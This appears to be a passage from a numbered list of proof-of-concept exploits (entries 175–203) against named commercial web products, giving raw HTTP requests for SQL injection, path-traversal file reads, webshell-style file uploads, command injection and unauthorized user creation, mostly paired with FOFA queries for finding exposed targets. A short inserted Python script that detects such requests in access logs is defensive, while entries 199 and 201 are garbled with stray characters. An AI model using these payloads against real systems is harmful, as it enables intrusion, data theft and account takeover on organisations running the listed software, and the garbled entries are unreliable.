GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

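Entries 160 through 175 are file-read and blind SQL injection requests whose shape is visible in ordinary web-server access logs: encoded or plain ../ sequences reaching for /etc/passwd, Web.Config or WEB-INF/web.xml, and WAITFOR DELAY / SLEEP() primitives in query strings. The following Python script is an added example written for this page, not code from the original article. It scans constructed sample log lines (combined log format, with made-up IPs and timestamps) after repeated URL-decoding, so that the %2F..%2F form from entry 160 is caught, and reports each matching source IP with the rules it tripped.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines modelled on the request shapes in
# entries 160-175; the IPs, timestamps and sizes are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:07:41:00 +0800] "GET /%2F%2F%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1840
10.0.0.6 - - [05/Jun/2024:07:41:03 +0800] "GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1" 200 2210
10.0.0.7 - - [05/Jun/2024:07:41:05 +0800] "GET /selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1" 500 312
10.0.0.8 - - [05/Jun/2024:07:41:09 +0800] "GET /run_stop/delete.do?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+ HTTP/1.1" 200 77
10.0.0.9 - - [05/Jun/2024:07:41:12 +0800] "GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=report.pdf HTTP/1.1" 200 51200
10.0.0.9 - - [05/Jun/2024:07:41:15 +0800] "POST /clients/MyCRL HTTP/1.1" 200 4096
"""

# Extracts the request line from a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(target: str) -> str:
    """Undo up to three layers of URL-encoding and fold '+' to a space, so that
    %2F..%2F, %252e%252e and WAITFOR+DELAY all become directly comparable."""
    s = target
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("+", " ")


# Detection rules keyed on the request shapes that appear in the listed entries.
RULES = {
    "path_traversal": re.compile(r"(?:\.\./|\.\.\\)"),
    "sensitive_file": re.compile(r"/etc/(?:passwd|shadow)|web\.config|WEB-INF/web\.xml", re.I),
    "blind_sqli_delay": re.compile(r"WAITFOR\s+DELAY|SLEEP\s*\(\s*\d+\s*\)|pg_sleep\s*\(", re.I),
}


def classify(line: str) -> list:
    """Return the names of the rules that match one access-log line (empty if none)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = normalize(m.group("target"))
    return [name for name, rx in RULES.items() if rx.search(target)]


def scan(log_text: str) -> list:
    """Return (source_ip, matched_rules) for every line that trips at least one rule."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            hits.append((line.split(" ", 1)[0], tags))
    return hits


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(f"{ip}: {', '.join(tags)}")
```

Two caveats when running this over real logs: request bodies are not in access logs, so POST-body payloads such as entry 173's aCSHELL/../../etc/shadow and entry 170's filename=../webapps/ROOT/WEB-INF/web.xml need full-request logging or a WAF rule, and the repeated decode in normalize() is what catches double-encoded traversal that a single unquote() would miss.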
176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (Esafenet) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科 (Hillstone) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
------WebKitFormBoundaryKNt0t4vBe8cX9rZk

Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

2 W" J2 _% T# L! Y, B% ?199. cockpit系统assetsmanager_upload接口 文件上传
W& r6 U' S6 \& d( [% F6 r
; A& X5 `) K* D* |% W! l8 ^1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" U9 `, l, {- d5 Q. xGET /auth/login?to=/ HTTP/1.18 M5 i; q( Q' S" Z
# q9 T- k- u! J; p5 z5 _; Q响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
7 G9 \' I3 t* J4 N* @( J" l8 u K* X$ U6 Z9 W
2.使用刚才上一步获取到的jwt获取cookie:
c: X E3 p+ ] R9 T- O' D) ~% ~" h+ u8 R" w
POST /auth/check HTTP/1.1
+ k* S- S5 @% m9 b+ jContent-Type: application/json% H% R# b+ `7 Y4 `2 ^
+ u/ W6 @$ q, _6 l( S5 B$ q
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
! {3 E* S# v+ n9 }+ T F, Q' L
7 m- i# g0 |9 v) } Q: N; ~) V响应:200,返回值:
2 U h$ o( L, n+ i% R6 p/ V- oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=// `: b" v8 |# N) d# d6 b
Fofa:title="Authenticate Please!"% X7 G5 h3 [) E! x# A/ I
POST /assetsmanager/upload HTTP/1.15 `" }- E; w" [+ f" E
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
, F6 w8 L+ U+ V9 B/ C# y* yCookie: mysession=95524f01e238bf51bb60d77ede3bea92
N i* D) f: O, r; h# N) g' _: w' F8 q7 M* d, A
-----------------------------36D28FBc36bd6feE7Fb3
! X j' b6 X/ Y' o% z2 dContent-Disposition: form-data; name="files[]"; filename="tttt.php"% z, J! ^7 Y" |, Y( K2 z
Content-Type: text/php; D& @% _6 K6 f" E( Z/ ?
3 N1 }) t$ g/ k; X% C: F<?php echo "tttt";unlink(__FILE__);?>0 s8 u6 G3 _7 m" U; [% _
-----------------------------36D28FBc36bd6feE7Fb3
3 c T) a# B; ^* k% q' uContent-Disposition: form-data; name="folder"
3 @; W' X- j4 f2 ~0 d6 n8 p, p& U8 _) S, m$ i
-----------------------------36D28FBc36bd6feE7Fb3--; r0 V0 z0 b2 l2 |) q- g2 u
- }8 x9 d+ s9 X h" A# w8 j, U% l/ V
/storage/uploads/tttt.php# p$ Z8 k% s6 U% n) {0 q, l

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

" P! q9 C: @/ U; |( k2 {6 m" L& l201. 方正全媒体新闻采编系统 binary SQL注入
) u. a1 f( t; T; ~& W7 r; CFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
7 @. V! a% [/ y+ ~- U# a* |! vPOST /newsedit/newsplan/task/binary.do HTTP/1.1
; K: I3 @" t& G2 Y4 EContent-Type: application/x-www-form-urlencoded
" O- O, h0 m) vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 _" \5 A8 U6 {9 W& _& @Accept-Encoding: gzip, deflate
5 T, r+ F a7 F. H) [" i6 O3 rAccept-Language: zh-CN,zh;q=0.9
1 }6 z' U2 V! Y; O+ ~, hConnection: close
. T0 W! W0 l2 x$ A% K/ t6 V( d( l) j1 p
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1+ B( X+ O" V3 [& t- n( \& c
# ]7 N$ m, Q. k7 ?& w
202. 微擎 System AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below with those obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"
__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain
Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--